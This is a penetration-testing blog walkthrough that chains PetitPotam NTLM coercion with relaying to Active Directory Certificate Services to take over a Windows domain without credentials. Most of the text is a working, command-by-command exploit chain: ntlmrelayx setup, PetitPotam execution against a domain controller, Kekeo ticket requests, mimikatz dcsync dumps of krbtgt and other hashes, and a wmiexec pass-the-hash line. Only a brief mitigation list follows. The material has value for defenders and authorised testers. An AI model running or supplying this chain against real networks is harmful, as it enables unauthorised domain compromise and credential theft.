From Stranger to DA // Using PetitPotam to NTLM relay to Domain Administrator
Knock knock, who’s there? Your new DA!
Several vulnerabilities that have been recently disclosed, namely:
- MS-EFSRPC – AKA PetitPotam
- Credential Relaying abusing the AD CS role
Any attacker with internal network access, such as a phished client or a malicious planted device in the network, can take over the entire Active Directory domain without any initial credentials. Domain Controllers and AD CS is vulnerable to this attack currently in the default configuration.
When PetitPotam is exploited and NTLM credentials are relayed to Active Directory Certificate Services, an attacker can obtain Domain Administrator privileges without any prior authentication to the domain. This article will detail the steps necessary for exploitation, followed by some words on mitigations for PetitPotam.
An attacker can trigger a Domain Controller using PetitPotam to NTLM relay credentials to a host of choice. The Domain Controller’s NTLM Credentials can then be relayed to the Active Directory Certificate Services (AD CS) Web Enrollment pages, and a DC certificate can be enrolled. This certificate can then be used to request a TGT (Ticket Granting Ticket) and compromise the entire domain through Pass-The-Ticket.
AD CS (Active Directory Certificate Services) is particularly interesting as it offers role services that by default accept NTLM based authentication. These services specifically include Certificate Authority Web Enrollment and the Certificate Enrollment Web Service.
- Use PetitPotam to trigger NTLM authentication from the Domain Controller to the Listener (Running Responder or ntlmrelayx)
- Use ntlmrelayx to relay the DC’s credentials to the AD CS (Active Directory Certificate Services) server with Web Enrollment enabled (NTLM auth must be enabled and is enabled by default), using the “KerberosAuthentication” or “DomainControllers” AD CS template.
- Obtain Base64 PKCS12 Certificate Obtained through NTLM relaying
- Use the Base64 PKCS12 cert to import to Kekeo to ask for a TGT (Ticket Granting Ticket)
- Use mimikatz to dump LSA secrets for the user of choice (Administrator, Krbtgt etc)
- Note down the NT hash from the domain administrator user
- Use wmiexec to gain execution as that user against the Domain Controller and perform Pass-The-Hash of the NT hash
- Profit! You’re DA!
Step 1-3 – Exploit PetitPotam and Relay to Active Directory Certificate Services
Before you can exploit PetitPotam (MS-EFSRPC), you need to setup ntlmrelayx to catch and relay to the AD CS server. In this example we’re going to be using the KerberosAuthentication AD CS template, however, we could have also used the DomainControllers template.
git clone https://github.com/ExAndroidDev/impacket.git # Clone the custom ntlmrelayx repo cd impacket git checkout ntlmrelayx-adcs-attack # checkout to the right branch - this caught me out sudo pip3 uninstall impacket # Uninstall the old impacket so there aren't any conflicts sudo pip uninstall impacket sudo pip3 install -r requirements.txt sudo python3 setup.py install # install this version of impacket with the adcs flag sudo python3 ntlmrelayx.py -debug -smb2support --target http://pki.lab.local/certsrv/certfnsh.asp --adcs --template KerberosAuthentication # start the relay - change pki.lab.local to the domain name of your ADCS Server
Now that ntlmrelayx is waiting, trigger NTLM authentication through PetitPotam. (Note, there are several other ways to trigger NTLM authentication, including: Responder, mitm6, PrinterBug, PrintNightmare etc). This will cause the DC to authenticate with the relay listener and relay NTLM credentials to the AD CS server.
Use PetitPotam to trigger NTLM authentication from the Domain Controller against the Listener (Running Responder or ntlmrelayx)
git clone https://github.com/topotam/PetitPotam cd PetitPotam/ sudo pip3 install -r requirements.txt python3 Petitpotam.py <listener> <target (DC)> # In this case, your listener is your relay IP, and the target is the IP of the domain controller you're targeting
Step 4-6 – Obtain a TGT with the Base64 PKCS12 Certificate enrolled to AD CS
Take the Base64 PKCS12 certificate which is now enrolled to AD CS (Active Directory Certificate Services) and import it to Kekeo to obtain a TGT (Ticket Granting Ticket). An attacker can also use Rubeus to perform this step
Example Demo by Benjamin Delpy
Below is a short demo example from Benjamin Delpy / Gentilkiwi on exploitation using Kekeo & Mimikatz to exploit PetitPotam & Dump LSA.
- Use Kekeo to ask for a TGT from pkcs12 Base64 certificate obtained through ntlmrelaying
- Use mimikatz to dump LSA secrets
curl https://github.com/gentilkiwi/kekeo/releases/download/2.2.0-20210723/kekeo.zip -o kekeo.zip tar -xf .\kekeo.zip .\x64\kekeo.exe base64 /input:on tgt::ask /pfx:<base64 cert from relay> /user:dc-101$ /domain:spencer.local /ptt exit curl https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724/mimikatz_trunk.zip -o mimikatz.zip tar -xf mimikatz.zip .\x64\mimikatz.exe lsadump::dcsync /domain:spencer.local /user:krbtgt # note down the ntlm hash lsadump::dcsync /domain:spencer.local /user:<any user> exit
Step 7 – Pass-The-Hash of the NT hash of the target User
Use the NT hash of the target user to gain execution through WMI.
wmiexec.py -hashes :9815c330fd6ce34663a2e7a5f0444848 firstname.lastname@example.org
These two bugs chained together allow for instant escalation from low privilege user to domain administrator in a matter of minutes. This is a devastating bug that at the time of writing will work on a fully patched domain controller and active directory certificate services setup.
This article will not go into deep detail regarding mitigations as Hasain has already written a very extensive article on mitigations for PetitPotam and preventing the capture of NT hashes, this can be found here.
- Remove the listed role services if not justified by a business need. In most of the cases the affected services are replaceable by other API/interfaces such as the built-in RPC interfaces.
- Restrict/disable inbound NTLM authentication to the server running the role service by setting the policy “Network security: Restrict NTLM: Incoming NTLM traffic”.
- Disable/remove the NTLM provider in the Internet Information Services (IIS) running the selected role services.
Links & Further Research
Furthermore in-depth reading on this topic and the theory behind it can be found below: